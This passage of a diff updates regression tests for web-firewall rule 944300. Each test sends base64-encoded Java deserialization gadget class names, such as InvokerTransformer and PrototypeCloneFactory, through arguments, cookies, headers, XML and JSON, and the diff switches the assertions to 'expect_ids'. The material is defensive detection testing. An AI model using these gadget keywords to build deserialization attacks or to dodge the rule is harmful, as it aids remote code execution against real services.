"test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 186 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3588,7 +3773,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 187 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3607,7 +3793,8 @@ tests: version: "HTTP/1.0" data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 188 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3626,7 +3813,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 189 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3645,7 +3833,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 190 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3665,7 +3854,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 191 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3685,7 +3875,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 192 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3705,7 +3896,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 193 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3724,7 +3916,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 194 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3743,7 +3936,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 195 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3762,7 +3956,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 196 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3781,7 +3976,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 197 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3800,7 +3996,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 198 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3819,7 +4016,8 @@ tests: version: "HTTP/1.0" data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 199 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3838,7 +4036,8 @@ tests: version: "HTTP/1.0" data: "test=aW52b2tlcnRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 200 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3857,7 +4056,8 @@ tests: version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 201 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3877,7 +4077,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 202 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3897,7 +4098,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 203 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3917,7 +4119,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 204 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3936,7 +4139,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 205 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3955,7 +4159,8 @@ tests: version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 206 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3974,7 +4179,8 @@ tests: version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 207 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3993,7 +4199,8 @@ tests: version: "HTTP/1.0" data: "test=aW52b2tlcnRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 208 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -4012,7 +4219,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 209 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -4031,7 +4239,8 @@ tests: version: "HTTP/1.0" data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 210 desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4050,7 +4259,8 @@ tests: version: "HTTP/1.0" data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 211 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4069,7 +4279,8 @@ tests: version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 212 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4089,7 +4300,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 213 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4109,7 +4321,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 214 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4129,7 +4342,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 215 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4148,7 +4362,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 216 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4167,7 +4382,8 @@ tests: version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 217 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4186,7 +4402,8 @@ tests: version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 218 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4205,7 +4422,8 @@ tests: version: "HTTP/1.0" data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 219 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4224,7 +4442,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 220 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4243,7 +4462,8 @@ tests: version: "HTTP/1.0" data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 221 desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4262,7 +4482,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnZva2VydHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 222 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4281,7 +4502,8 @@ tests: version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 223 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4301,7 +4523,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 224 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4321,7 +4544,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 225 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4341,7 +4565,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 226 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4360,7 +4585,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 227 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4379,7 +4605,8 @@ tests: version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 228 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4398,7 +4625,8 @@ tests: version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 229 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4417,7 +4645,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnZva2VydHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 230 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4436,7 +4665,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 231 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4455,7 +4685,8 @@ tests: version: "HTTP/1.0" data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 232 desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4474,7 +4705,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 233 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4493,7 +4725,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 234 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4513,7 +4746,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 235 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4533,7 +4767,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 236 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4553,7 +4788,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 237 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4572,7 +4808,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 238 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4591,7 +4828,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 239 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4610,7 +4848,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 240 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4629,7 +4868,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 241 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4648,7 +4888,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 242 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: @@ -4667,7 +4908,8 @@ tests: version: "HTTP/1.0" data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 243 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4686,7 +4928,8 @@ tests: version: "HTTP/1.0" data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 244 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4705,7 +4948,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 245 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4725,7 +4969,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 246 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4745,7 +4990,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 247 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4765,7 +5011,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 248 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4784,7 +5031,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 249 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4803,7 +5051,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 250 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4822,7 +5071,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 251 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4841,7 +5091,8 @@ tests: version: "HTTP/1.0" data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 252 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4860,7 +5111,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 253 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: @@ -4879,7 +5131,8 @@ tests: version: "HTTP/1.0" data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 254 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4898,7 +5151,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 255 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4917,7 +5171,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 256 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4937,7 +5192,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 257 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4957,7 +5213,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 258 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4977,7 +5234,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 259 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -4996,7 +5254,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 260 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5015,7 +5274,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 261 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5034,7 +5294,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 262 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5053,7 +5314,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 263 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5072,7 +5334,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 264 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: @@ -5091,7 +5354,8 @@ tests: version: "HTTP/1.0" data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 265 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5110,7 +5374,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 266 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5129,7 +5394,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 267 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5149,7 +5415,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 268 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5169,7 +5436,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 269 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5189,7 +5457,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 270 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5208,7 +5477,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 271 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5227,7 +5497,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 272 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5246,7 +5517,8 @@ tests: version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 273 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5265,7 +5537,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 274 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5284,7 +5557,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 275 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: @@ -5303,7 +5577,8 @@ tests: version: "HTTP/1.0" data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 276 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5322,7 +5597,8 @@ tests: version: "HTTP/1.0" data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 277 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5341,7 +5617,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 278 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5361,7 +5638,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 279 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5381,7 +5659,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 280 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5401,7 +5680,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 281 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5420,7 +5700,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 282 desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5439,7 +5720,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 283 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5458,7 +5740,8 @@ tests: version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 284 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5477,7 +5760,8 @@ tests: version: "HTTP/1.0" data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 285 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5496,7 +5780,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 286 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: @@ -5515,7 +5800,8 @@ tests: version: "HTTP/1.0" data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 287 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5534,7 +5820,8 